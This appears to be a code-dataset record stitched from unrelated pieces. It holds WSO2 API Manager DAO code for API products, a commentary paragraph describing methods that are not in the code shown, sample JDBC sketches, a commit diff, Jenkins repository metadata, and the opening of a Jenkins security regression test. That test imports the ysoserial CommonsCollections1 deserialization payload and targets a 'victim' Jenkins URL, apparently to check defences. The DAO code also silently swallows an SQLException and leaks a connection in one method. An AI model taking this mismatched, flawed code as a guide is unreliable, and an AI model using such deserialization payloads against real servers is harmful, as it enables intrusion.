Add the resource_ma List<APIProductResource> productApis = apiproduct.getProductResources(); for (APIProductResource apiProductResource : productApis) { APIIdentifier apiIdentifier = apiProductResource.getApiIdentifier(); int apiID = getAPIID(apiIdentifier, connection); prepStmtAddScopeLink.setInt(1, apiID); prepStmtAddScopeLink.setInt(2, scopeId); prepStmtAddScopeLink.addBatch(); List<URITemplate> uriTemplates = apiProductResource.getResources(); for (URITemplate uriTemplate : uriTemplates) { prepStmtAddResourceMapping.setInt(1, productId); prepStmtAddResourceMapping.setInt(2, uriTemplate.getId()); prepStmtAddResourceMapping.addBatch(); //add scope uri temaplate mapping String resourceKey = APIUtil .getResourceKey(getAPIContext(apiIdentifier), apiIdentifier.getVersion(), uriTemplate.getResourceURI(), uriTemplate.getHTTPVerb()); prepStmtAddScopeResourceMapping.setString(1, resourceKey); prepStmtAddScopeResourceMapping.setInt(2, scopeId); prepStmtAddScopeResourceMapping.setInt(3, APIUtil.getTenantIdFromTenantDomain(tenantDomain)); prepStmtAddScopeResourceMapping.addBatch(); } } prepStmtAddScopeLink.executeBatch(); prepStmtAddScopeLink.clearBatch(); prepStmtAddResourceMapping.executeBatch(); prepStmtAddResourceMapping.clearBatch(); prepStmtAddScopeResourceMapping.executeBatch(); prepStmtAddScopeResourceMapping.clearBatch(); connection.commit(); } catch (SQLException e) { handleException("Error while adding API product " + apiproduct.getName() + " of provider " + apiproduct.getProvider(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddAPIProduct, null, null); APIMgtDBUtil.closeAllConnections(prepStmtAddResourceMapping, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeEntry, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeLink, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeResourceMapping, connection, null); } } public APIProduct getAPIProduct(String uuid) throws APIManagementException { APIProduct product = new APIProduct(); Connection connection = null; PreparedStatement prepStmtGetAPIProduct = null; PreparedStatement prepStmtGetAPIProductResource = null; ResultSet rs = null; ResultSet rs2 = null; try { connection = APIMgtDBUtil.getConnection(); //TODO check this //TODO move to constant String queryGetAPIProduct = "SELECT API_PRODUCT_ID,UUID,DESCRIPTION,API_PRODUCT_PROVIDER,API_PRODUCT_NAME,API_PRODUCT_TIER,VISIBILITY,BUSINESS_OWNER,BUSINESS_OWNER_EMAIL,SUBSCRIPTION_AVAILABILITY,STATE FROM AM_API_PRODUCT WHERE UUID = ?"; int productId = 0; prepStmtGetAPIProduct = connection.prepareStatement(queryGetAPIProduct); prepStmtGetAPIProduct.setString(1, uuid); rs = prepStmtGetAPIProduct.executeQuery(); if (rs.next()) { product.setUuid(rs.getString("UUID")); product.setDescription(rs.getString("DESCRIPTION")); product.setProvider(rs.getString("API_PRODUCT_PROVIDER")); product.setName(rs.getString("API_PRODUCT_NAME")); product.setProductTier(rs.getString("API_PRODUCT_TIER")); product.setVisibility(rs.getString("VISIBILITY")); product.setBusinessOwner(rs.getString("BUSINESS_OWNER")); product.setBusinessOwnerEmail(rs.getString("BUSINESS_OWNER_EMAIL")); product.setSubscriptionAvailability(rs.getString("SUBSCRIPTION_AVAILABILITY")); product.setState(rs.getString("STATE")); productId = rs.getInt("API_PRODUCT_ID"); } //get api resources related to api product //TODO move to constant String queryListProductResourceMapping = "SELECT API_NAME, API_PROVIDER , API_VERSION ,T1.API_ID ,API_PRODUCT_ID, HTTP_METHOD, URL_PATTERN, " + 
"T1.URL_MAPPING_ID " + "FROM " + "(SELECT API_NAME ,API_PROVIDER, API_VERSION, API.API_ID,URL.URL_MAPPING_ID " + "FROM AM_API_URL_MAPPING URL, AM_API API " + "WHERE API.API_ID = URL.API_ID) T1 " + "INNER JOIN " + "(SELECT API_PRODUCT_ID, HTTP_METHOD, URL_PATTERN, URL.URL_MAPPING_ID " + "FROM AM_API_PRODUCT_MAPPING PRODUCT, AM_API_URL_MAPPING URL " + "WHERE URL.URL_MAPPING_ID = PRODUCT.URL_MAPPING_ID AND API_PRODUCT_ID =? ) T2 " + "ON " + "(T1.URL_MAPPING_ID =T2.URL_MAPPING_ID )"; prepStmtGetAPIProductResource = connection.prepareStatement(queryListProductResourceMapping); prepStmtGetAPIProductResource.setInt(1, productId); //keep a temporary map for each resources for each api in the product Map<String, APIProductResource> resourceMap = new HashMap<String, APIProductResource>(); String apiId = ""; rs2 = prepStmtGetAPIProductResource.executeQuery(); while (rs2.next()) { apiId = rs2.getString("API_ID"); APIProductResource resource; if (resourceMap.containsKey(apiId)) { resource = resourceMap.get(apiId); } else { resource = new APIProductResource(); resource.setApiName(rs2.getString("API_NAME")); APIIdentifier identifier = new APIIdentifier(rs2.getString("API_PROVIDER"), rs2.getString("API_NAME"), rs2.getString("API_VERSION")); resource.setApiId(identifier.toString()); // TODO set API UUID resource.setApiIdentifier(identifier); } URITemplate template = new URITemplate(); template.setHTTPVerb(rs2.getString("HTTP_METHOD")); template.setResourceURI(rs2.getString("URL_PATTERN")); template.setId(rs2.getInt("URL_MAPPING_ID")); resource.setResource(template); resourceMap.put(apiId, resource); } product.setProductResources(new ArrayList<APIProductResource>(resourceMap.values())); } catch (SQLException e) { handleException("Error while retrieving api product for UUID " + uuid , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProduct, null, rs); APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProductResource, connection, rs2); } return product; } public List<APIProduct> getAPIProductsForTenantDomain(String tenantDomain) throws APIManagementException { List<APIProduct> productList = new ArrayList<APIProduct>(); Connection connection = null; PreparedStatement prepStmtGetAPIProduct = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); //TODO move to constant String queryGetAPIProduct = "SELECT API_PRODUCT_ID,UUID,DESCRIPTION,API_PRODUCT_PROVIDER,API_PRODUCT_NAME,API_PRODUCT_TIER,VISIBILITY,BUSINESS_OWNER,BUSINESS_OWNER_EMAIL,SUBSCRIPTION_AVAILABILITY,TENANT_DOMAIN,STATE FROM AM_API_PRODUCT WHERE TENANT_DOMAIN = ?"; prepStmtGetAPIProduct = connection.prepareStatement(queryGetAPIProduct); prepStmtGetAPIProduct.setString(1, tenantDomain); rs = prepStmtGetAPIProduct.executeQuery(); while (rs.next()) { APIProduct product = new APIProduct(); //only send a product.setName(rs.getString("API_PRODUCT_NAME")); product.setUuid(rs.getString("UUID")); product.setProvider(rs.getString("API_PRODUCT_PROVIDER")); product.setState(rs.getString("STATE")); productList.add(product); } } catch (SQLException e) { handleException("Error while retrieving api product for tenant " + tenantDomain , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProduct, connection, rs); } return productList; } public void deleteAPIProduct(String uuid, String tenantDomain) throws APIManagementException { String deleteQuery = "DELETE FROM AM_API_PRODUCT WHERE UUID = ? 
AND TENANT_DOMAIN = ?"; PreparedStatement ps = null; Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(deleteQuery); ps.setString(1, uuid); ps.setString(2, tenantDomain); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting api product " + uuid + " tenant " + tenantDomain , e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } private void deleteProductMappingsForAPI(API api, List<APIProduct> apiProducts) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; String querydeleteProductMappingsForAPI = "DELETE FROM AM_API_PRODUCT_MAPPING WHERE URL_MAPPING_ID = ?"; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); preparedStatement = connection.prepareStatement(querydeleteProductMappingsForAPI); for (APIProduct apiProduct : apiProducts) { List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { if (productResource.getApiIdentifier().equals(api.getId())) { //TODO: check and modify to use UUID List<URITemplate> mappedAPIResources = productResource.getResources(); if (mappedAPIResources.size() > 0 && log.isDebugEnabled()) { log.debug( "Removing url mappings from API : " + api.getId().toString() + " on API product : " + apiProduct.getName()); } for (URITemplate template : mappedAPIResources) { preparedStatement.setInt(1, template.getId()); preparedStatement.addBatch(); } } } } preparedStatement.executeBatch(); preparedStatement.clearBatch(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on API product mapping updating", e1); } } handleException("Error occured while removing url template mappings from API " + api.getId().toString() + " on API Products.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, null); } } private void addProductMappingsForAPI(API api, List<APIProduct> apiProducts) throws APIManagementException { Connection connection = null; String queryAddProductResourceMappings = "INSERT INTO AM_API_PRODUCT_MAPPING (API_PRODUCT_ID,URL_MAPPING_ID) " + "VALUES (?, ?)"; String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String queryAddcopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; PreparedStatement prepStmtAddProductResourceMappings = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmtAddProductResourceMappings = connection.prepareStatement(queryAddProductResourceMappings); //get previously added resources and re-add them to product with new URL_MAPPING_ID Map<String, URITemplate> templateMap = getURITemplatesForAPI(api); int productId; for (APIProduct apiProduct : apiProducts) { productId = getAPIProductId(apiProduct.getName(), apiProduct.getProvider(), null); List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { if (api.getId().equals(productResource.getApiIdentifier())) { List<URITemplate> templates = productResource.getResources(); for (URITemplate template : templates) { String key = template.getHTTPVerb() + ":" + template.getResourceURI(); if 
(templateMap.containsKey(key)) { //update api template mapping id template.setId(templateMap.get(key).getId()); //add record to database back with new ID prepStmtAddProductResourceMappings.setInt(1, productId); prepStmtAddProductResourceMappings.setInt(2, template.getId()); prepStmtAddProductResourceMappings.addBatch(); } else { //ToDo : what if the resource had been deleted while updating API log.info("Resource " + key + " was deleted from API " + api.getId().toString() + " while updating the API. So it is no longer available with API product " + apiProduct.getName()); } } } } } prepStmtAddProductResourceMappings.executeBatch(); prepStmtAddProductResourceMappings.clearBatch(); connection.commit(); } catch (SQLException e) { } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddProductResourceMappings, connection, null); } } private int getAPIProductId(String productName, String provider, String version) throws APIManagementException { Connection conn = null; //TODO: move query to constants. Use version for now I am not using version in the query since it is still set to null String queryGetProductId = "SELECT API_PRODUCT_ID FROM AM_API_PRODUCT WHERE API_PRODUCT_NAME = ? AND " + "API_PRODUCT_PROVIDER = ?"; PreparedStatement preparedStatement = null; ResultSet rs = null; int productId = -1; try { conn = APIMgtDBUtil.getConnection(); preparedStatement = conn.prepareStatement(queryGetProductId); preparedStatement.setString(1, productName); preparedStatement.setString(2, provider); rs = preparedStatement.executeQuery(); if (rs.next()) { productId = rs.getInt("API_PRODUCT_ID"); } if (productId == -1) { String msg = "Unable to find the API Product : " + productId + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while retrieving api product id for product " + productName + " by " + provider, e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, conn, rs); } return productId; } private void addProductScopes(List<APIProduct> apiProducts, int tenantID) throws APIManagementException { Connection connection = null; String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String queryAddcopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; PreparedStatement prepStmtAddScopeEntry = null; PreparedStatement prepStmtAddcopeLink = null; PreparedStatement prepStmtAddScopeResourceMapping = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); prepStmtAddScopeEntry = connection.prepareStatement(queryAddScopeEntry, new String[] { "scope_id" }); prepStmtAddcopeLink = connection.prepareStatement(queryAddcopeLink); prepStmtAddScopeResourceMapping = connection.prepareStatement(queryAddScopeResourceMapping); for (APIProduct apiProduct : apiProducts) { //add product scope //TODO finalize format and move to constants String productScopeKey = "productscope-" + apiProduct.getName() + ":" + apiProduct.getProvider(); //for now use key for display name as well TODO check and modify String productScopeDisplayName = productScopeKey; Scope productScope = new Scope(); productScope.setKey(productScopeKey); productScope.setName(productScopeDisplayName); int scopeId = 0; prepStmtAddScopeEntry.setString(1, productScope.getKey()); prepStmtAddScopeEntry.setString(2, productScope.getName()); prepStmtAddScopeEntry.setString(3, productScope.getDescription()); prepStmtAddScopeEntry.setInt(4, tenantID); prepStmtAddScopeEntry.execute(); rs = 
prepStmtAddScopeEntry.getGeneratedKeys(); if (rs.next()) { scopeId = rs.getInt(1); } //breaks the flow if product scope is not added to the db correctly if (scopeId == 0) { throw new APIManagementException( "Error while adding scope for API product : " + apiProduct.getUuid()); } productScope.setId(scopeId); //attach product scope to each resource api List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { APIIdentifier apiIdentifier = productResource.getApiIdentifier(); prepStmtAddcopeLink.setInt(1, getAPIID(apiIdentifier, connection)); prepStmtAddcopeLink.setInt(2, scopeId); prepStmtAddcopeLink.addBatch(); //attach product scope to resource mappings List<URITemplate> templates = productResource.getResources(); for (URITemplate template : templates) { //add scope uri temaplate mapping String resourceKey = APIUtil .getResourceKey(getAPIContext(apiIdentifier), apiIdentifier.getVersion(), template.getResourceURI(), template.getHTTPVerb()); prepStmtAddScopeResourceMapping.setString(1, resourceKey); prepStmtAddScopeResourceMapping.setInt(2, scopeId); prepStmtAddScopeResourceMapping.setInt(3, tenantID); prepStmtAddScopeResourceMapping.addBatch(); } } } prepStmtAddcopeLink.executeBatch(); prepStmtAddcopeLink.clearBatch(); prepStmtAddScopeResourceMapping.executeBatch(); prepStmtAddScopeResourceMapping.clearBatch(); connection.commit(); } catch (SQLException e) { handleException("Error while adding product resource and scope mappings for api product ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddScopeEntry, connection, rs); APIMgtDBUtil.closeAllConnections(prepStmtAddcopeLink, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeResourceMapping, connection, null); } } }
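The DAO methods in the chunk above (insertAccessUrlMappings, updateLabel, addApplicationAttributes, addAPIProduct) all repeat the same JDBC shape: turn off auto-commit, fill one or more batched PreparedStatements, commit, roll back on SQLException, then restore the original auto-commit flag. A minimal self-contained sketch of that pattern follows; the table name and JDBC URL are hypothetical, and DriverManager stands in for the APIMgtDBUtil connection pool used by the real code.

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.List;

public class BatchInsertSketch {
    // Hypothetical table; the real DAO binds SQLConstants such as ADD_LABEL_URL_MAPPING_SQL.
    private static final String INSERT_SQL =
            "INSERT INTO DEMO_LABEL_URLS (LABEL_UUID, ACCESS_URL) VALUES (?, ?)";

    public static void insertUrls(String jdbcUrl, String labelUuid, List<String> urls) throws SQLException {
        try (Connection connection = DriverManager.getConnection(jdbcUrl)) {
            boolean initialAutoCommit = connection.getAutoCommit();
            connection.setAutoCommit(false);
            try (PreparedStatement statement = connection.prepareStatement(INSERT_SQL)) {
                for (String url : urls) {
                    statement.setString(1, labelUuid);
                    statement.setString(2, url);
                    statement.addBatch();          // queue one row per access URL
                }
                statement.executeBatch();          // one round trip for the whole batch
                connection.commit();               // make the row group visible atomically
            } catch (SQLException e) {
                connection.rollback();             // undo the partial batch on failure
                throw e;
            } finally {
                connection.setAutoCommit(initialAutoCommit);
            }
        }
    }
}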
Fix tenant api product creation issue
components/apimgt/org.wso2.carbon.apimgt.impl/src/main/java/org/wso2/carbon/apimgt/impl/dao/ApiMgtDAO.java
Fix tenant api product creation issue
<ide><path>omponents/apimgt/org.wso2.carbon.apimgt.impl/src/main/java/org/wso2/carbon/apimgt/impl/dao/ApiMgtDAO.java <ide> prepStmt = connection.prepareStatement(query); <ide> prepStmt.setString(1, api.getId().getApiName()); <ide> prepStmt.setString(2, api.getId().getVersion()); <del> prepStmt.setString(3, api.getId().getProviderName()); <add> prepStmt.setString(3, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); <ide> rs = prepStmt.executeQuery(); <ide> while (rs.next()) { <ide> URITemplate template = new URITemplate();
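The one-line change in the diff above wraps the provider name in APIUtil.replaceEmailDomainBack(...) before binding it to the AM_API lookup. The sketch below is only a hypothetical stand-in for that helper, assuming the usual WSO2 convention of encoding '@' in tenant user names as "-AT-"; the real method in org.wso2.carbon.apimgt.impl.utils.APIUtil may differ.

public final class ProviderNameSketch {
    private static final String EMAIL_SEPARATOR = "@";
    private static final String ENCODED_SEPARATOR = "-AT-";

    // Restore the e-mail form of a tenant provider name, e.g. "admin-AT-finance.com" -> "admin@finance.com".
    static String replaceEmailDomainBack(String provider) {
        if (provider != null && provider.contains(ENCODED_SEPARATOR)) {
            return provider.replace(ENCODED_SEPARATOR, EMAIL_SEPARATOR);
        }
        return provider;
    }

    public static void main(String[] args) {
        // The normalized form is what would be bound as the API_PROVIDER query parameter.
        System.out.println(replaceEmailDomainBack("admin-AT-finance.com"));
    }
}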
Java
mit
d7023f9a368317bb838046ccc9a3fe5b08db3945
0
batmat/jenkins,FarmGeek4Life/jenkins,gitaccountforprashant/gittest,MarkEWaite/jenkins,gusreiber/jenkins,varmenise/jenkins,ChrisA89/jenkins,huybrechts/hudson,batmat/jenkins,kohsuke/hudson,andresrc/jenkins,bpzhang/jenkins,FarmGeek4Life/jenkins,MichaelPranovich/jenkins_sc,pjanouse/jenkins,varmenise/jenkins,sathiya-mit/jenkins,escoem/jenkins,dennisjlee/jenkins,NehemiahMi/jenkins,dennisjlee/jenkins,ChrisA89/jenkins,rlugojr/jenkins,escoem/jenkins,aldaris/jenkins,jglick/jenkins,v1v/jenkins,kohsuke/hudson,stephenc/jenkins,ikedam/jenkins,recena/jenkins,recena/jenkins,sathiya-mit/jenkins,pjanouse/jenkins,olivergondza/jenkins,lilyJi/jenkins,amruthsoft9/Jenkis,ydubreuil/jenkins,kohsuke/hudson,jenkinsci/jenkins,jenkinsci/jenkins,Jochen-A-Fuerbacher/jenkins,alvarolobato/jenkins,DanielWeber/jenkins,viqueen/jenkins,kzantow/jenkins,ajshastri/jenkins,protazy/jenkins,Vlatombe/jenkins,sathiya-mit/jenkins,Jimilian/jenkins,pjanouse/jenkins,sathiya-mit/jenkins,rsandell/jenkins,protazy/jenkins,dennisjlee/jenkins,stephenc/jenkins,olivergondza/jenkins,patbos/jenkins,batmat/jenkins,duzifang/my-jenkins,FarmGeek4Life/jenkins,msrb/jenkins,NehemiahMi/jenkins,tangkun75/jenkins,varmenise/jenkins,NehemiahMi/jenkins,stephenc/jenkins,vjuranek/jenkins,wuwen5/jenkins,hplatou/jenkins,gitaccountforprashant/gittest,MichaelPranovich/jenkins_sc,jenkinsci/jenkins,patbos/jenkins,rlugojr/jenkins,wuwen5/jenkins,ErikVerheul/jenkins,protazy/jenkins,tangkun75/jenkins,DanielWeber/jenkins,SebastienGllmt/jenkins,duzifang/my-jenkins,ErikVerheul/jenkins,ErikVerheul/jenkins,viqueen/jenkins,samatdav/jenkins,ndeloof/jenkins,samatdav/jenkins,dariver/jenkins,amuniz/jenkins,amruthsoft9/Jenkis,ajshastri/jenkins,wuwen5/jenkins,bkmeneguello/jenkins,ErikVerheul/jenkins,csimons/jenkins,kzantow/jenkins,csimons/jenkins,jglick/jenkins,Jochen-A-Fuerbacher/jenkins,DanielWeber/jenkins,kzantow/jenkins,jenkinsci/jenkins,jglick/jenkins,evernat/jenkins,ChrisA89/jenkins,jpbriend/jenkins,bkmeneguello/jenkins,ChrisA89/jenkins,FarmGeek4Life/jenkins,MarkEWaite/jenkins,huybrechts/hudson,jpbriend/jenkins,damianszczepanik/jenkins,dariver/jenkins,batmat/jenkins,daniel-beck/jenkins,kzantow/jenkins,kohsuke/hudson,Vlatombe/jenkins,csimons/jenkins,MichaelPranovich/jenkins_sc,escoem/jenkins,azweb76/jenkins,bpzhang/jenkins,csimons/jenkins,tangkun75/jenkins,ErikVerheul/jenkins,ChrisA89/jenkins,msrb/jenkins,ydubreuil/jenkins,recena/jenkins,jenkinsci/jenkins,stephenc/jenkins,godfath3r/jenkins,recena/jenkins,fbelzunc/jenkins,tfennelly/jenkins,rsandell/jenkins,patbos/jenkins,vjuranek/jenkins,gitaccountforprashant/gittest,fbelzunc/jenkins,andresrc/jenkins,daniel-beck/jenkins,stephenc/jenkins,bkmeneguello/jenkins,Ykus/jenkins,aldaris/jenkins,andresrc/jenkins,jpbriend/jenkins,amuniz/jenkins,jglick/jenkins,aldaris/jenkins,msrb/jenkins,evernat/jenkins,MichaelPranovich/jenkins_sc,andresrc/jenkins,huybrechts/hudson,evernat/jenkins,alvarolobato/jenkins,huybrechts/hudson,csimons/jenkins,bpzhang/jenkins,msrb/jenkins,jpbriend/jenkins,huybrechts/hudson,protazy/jenkins,escoem/jenkins,oleg-nenashev/jenkins,olivergondza/jenkins,huybrechts/hudson,amruthsoft9/Jenkis,olivergondza/jenkins,NehemiahMi/jenkins,amuniz/jenkins,ChrisA89/jenkins,amuniz/jenkins,jpbriend/jenkins,escoem/jenkins,gusreiber/jenkins,viqueen/jenkins,patbos/jenkins,dariver/jenkins,protazy/jenkins,dennisjlee/jenkins,Vlatombe/jenkins,oleg-nenashev/jenkins,amuniz/jenkins,aldaris/jenkins,SebastienGllmt/jenkins,evernat/jenkins,oleg-nenashev/jenkins,daniel-beck/jenkins,damianszczepanik/jenkins,ErikVerheul/jenkins,fbelzunc/jenkins,ikedam/jenk
ins,ikedam/jenkins,kzantow/jenkins,ndeloof/jenkins,tfennelly/jenkins,duzifang/my-jenkins,MichaelPranovich/jenkins_sc,ikedam/jenkins,escoem/jenkins,ydubreuil/jenkins,Ykus/jenkins,v1v/jenkins,jglick/jenkins,rsandell/jenkins,wuwen5/jenkins,patbos/jenkins,oleg-nenashev/jenkins,samatdav/jenkins,damianszczepanik/jenkins,dariver/jenkins,kohsuke/hudson,NehemiahMi/jenkins,fbelzunc/jenkins,gitaccountforprashant/gittest,DanielWeber/jenkins,aldaris/jenkins,batmat/jenkins,protazy/jenkins,samatdav/jenkins,MarkEWaite/jenkins,azweb76/jenkins,vjuranek/jenkins,bpzhang/jenkins,daniel-beck/jenkins,godfath3r/jenkins,jpbriend/jenkins,fbelzunc/jenkins,amruthsoft9/Jenkis,oleg-nenashev/jenkins,MarkEWaite/jenkins,vjuranek/jenkins,andresrc/jenkins,bkmeneguello/jenkins,samatdav/jenkins,msrb/jenkins,msrb/jenkins,godfath3r/jenkins,csimons/jenkins,tfennelly/jenkins,v1v/jenkins,amruthsoft9/Jenkis,andresrc/jenkins,Jimilian/jenkins,ChrisA89/jenkins,ajshastri/jenkins,v1v/jenkins,batmat/jenkins,lilyJi/jenkins,bkmeneguello/jenkins,Jochen-A-Fuerbacher/jenkins,rsandell/jenkins,amuniz/jenkins,godfath3r/jenkins,gitaccountforprashant/gittest,gitaccountforprashant/gittest,jenkinsci/jenkins,ydubreuil/jenkins,Vlatombe/jenkins,DanielWeber/jenkins,sathiya-mit/jenkins,dariver/jenkins,v1v/jenkins,oleg-nenashev/jenkins,damianszczepanik/jenkins,gusreiber/jenkins,hplatou/jenkins,pjanouse/jenkins,pjanouse/jenkins,andresrc/jenkins,christ66/jenkins,tfennelly/jenkins,rlugojr/jenkins,kohsuke/hudson,MichaelPranovich/jenkins_sc,lilyJi/jenkins,Vlatombe/jenkins,ikedam/jenkins,ndeloof/jenkins,jenkinsci/jenkins,godfath3r/jenkins,recena/jenkins,alvarolobato/jenkins,olivergondza/jenkins,ydubreuil/jenkins,stephenc/jenkins,ydubreuil/jenkins,evernat/jenkins,christ66/jenkins,azweb76/jenkins,damianszczepanik/jenkins,DanielWeber/jenkins,amuniz/jenkins,tfennelly/jenkins,ajshastri/jenkins,fbelzunc/jenkins,lilyJi/jenkins,Jimilian/jenkins,SebastienGllmt/jenkins,Jimilian/jenkins,Ykus/jenkins,christ66/jenkins,gusreiber/jenkins,ndeloof/jenkins,Jochen-A-Fuerbacher/jenkins,godfath3r/jenkins,duzifang/my-jenkins,duzifang/my-jenkins,kohsuke/hudson,lilyJi/jenkins,daniel-beck/jenkins,ikedam/jenkins,ndeloof/jenkins,christ66/jenkins,Jochen-A-Fuerbacher/jenkins,DanielWeber/jenkins,amruthsoft9/Jenkis,wuwen5/jenkins,tangkun75/jenkins,sathiya-mit/jenkins,v1v/jenkins,lilyJi/jenkins,bpzhang/jenkins,dariver/jenkins,SebastienGllmt/jenkins,FarmGeek4Life/jenkins,SebastienGllmt/jenkins,jenkinsci/jenkins,FarmGeek4Life/jenkins,SebastienGllmt/jenkins,bkmeneguello/jenkins,dennisjlee/jenkins,Vlatombe/jenkins,alvarolobato/jenkins,godfath3r/jenkins,Ykus/jenkins,dennisjlee/jenkins,viqueen/jenkins,SebastienGllmt/jenkins,batmat/jenkins,ndeloof/jenkins,daniel-beck/jenkins,alvarolobato/jenkins,rlugojr/jenkins,csimons/jenkins,dennisjlee/jenkins,evernat/jenkins,ajshastri/jenkins,bkmeneguello/jenkins,tangkun75/jenkins,tangkun75/jenkins,wuwen5/jenkins,Ykus/jenkins,vjuranek/jenkins,Vlatombe/jenkins,christ66/jenkins,Jimilian/jenkins,escoem/jenkins,fbelzunc/jenkins,azweb76/jenkins,MichaelPranovich/jenkins_sc,daniel-beck/jenkins,pjanouse/jenkins,ndeloof/jenkins,samatdav/jenkins,pjanouse/jenkins,rsandell/jenkins,christ66/jenkins,damianszczepanik/jenkins,rlugojr/jenkins,viqueen/jenkins,hplatou/jenkins,stephenc/jenkins,azweb76/jenkins,recena/jenkins,viqueen/jenkins,rsandell/jenkins,tfennelly/jenkins,v1v/jenkins,ikedam/jenkins,oleg-nenashev/jenkins,sathiya-mit/jenkins,NehemiahMi/jenkins,ajshastri/jenkins,ydubreuil/jenkins,lilyJi/jenkins,christ66/jenkins,MarkEWaite/jenkins,patbos/jenkins,varmenise/jenkins,jglic
k/jenkins,hplatou/jenkins,olivergondza/jenkins,MarkEWaite/jenkins,bpzhang/jenkins,gusreiber/jenkins,olivergondza/jenkins,amruthsoft9/Jenkis,Jochen-A-Fuerbacher/jenkins,azweb76/jenkins,varmenise/jenkins,gusreiber/jenkins,aldaris/jenkins,MarkEWaite/jenkins,viqueen/jenkins,bpzhang/jenkins,recena/jenkins,Ykus/jenkins,wuwen5/jenkins,ajshastri/jenkins,patbos/jenkins,varmenise/jenkins,msrb/jenkins,rsandell/jenkins,duzifang/my-jenkins,azweb76/jenkins,rlugojr/jenkins,Ykus/jenkins,daniel-beck/jenkins,hplatou/jenkins,gusreiber/jenkins,kohsuke/hudson,jpbriend/jenkins,alvarolobato/jenkins,FarmGeek4Life/jenkins,tfennelly/jenkins,tangkun75/jenkins,duzifang/my-jenkins,kzantow/jenkins,damianszczepanik/jenkins,Jimilian/jenkins,ikedam/jenkins,Jimilian/jenkins,damianszczepanik/jenkins,evernat/jenkins,Jochen-A-Fuerbacher/jenkins,hplatou/jenkins,dariver/jenkins,huybrechts/hudson,rlugojr/jenkins,rsandell/jenkins,samatdav/jenkins,MarkEWaite/jenkins,kzantow/jenkins,NehemiahMi/jenkins,vjuranek/jenkins,aldaris/jenkins,protazy/jenkins,ErikVerheul/jenkins,hplatou/jenkins,gitaccountforprashant/gittest,alvarolobato/jenkins,vjuranek/jenkins,jglick/jenkins,varmenise/jenkins
/* * The MIT License * * Copyright 2015 CloudBees, Inc. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ package jenkins.security; import com.gargoylesoftware.htmlunit.FailingHttpStatusCodeException; import hudson.cli.CLI; import hudson.cli.CliPort; import hudson.remoting.BinarySafeStream; import hudson.util.DaemonThreadFactory; import java.io.ByteArrayOutputStream; import java.io.DataOutputStream; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.HttpURLConnection; import java.net.InetSocketAddress; import java.net.ServerSocket; import java.net.Socket; import java.net.URL; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import jenkins.security.security218.ysoserial.payloads.CommonsCollections1; import jenkins.security.security218.ysoserial.util.Serializables; import static org.junit.Assert.*; import org.junit.Test; import org.junit.Rule; import org.jvnet.hudson.test.JenkinsRule; import org.jvnet.hudson.test.recipes.PresetData; public class Security218BlackBoxTest { private static final String overrideURL = System.getenv("VICTIM_JENKINS_URL"); private static final String overrideHome = System.getenv("VICTIM_JENKINS_HOME"); static { assertTrue("$JENKINS_URL and $JENKINS_HOME must both be defined together", (overrideURL == null) == (overrideHome == null)); } private static final ExecutorService executors = Executors.newCachedThreadPool(new DaemonThreadFactory()); @Rule public JenkinsRule r = new JenkinsRule(); @SuppressWarnings("deprecation") // really mean to use getPage(String) 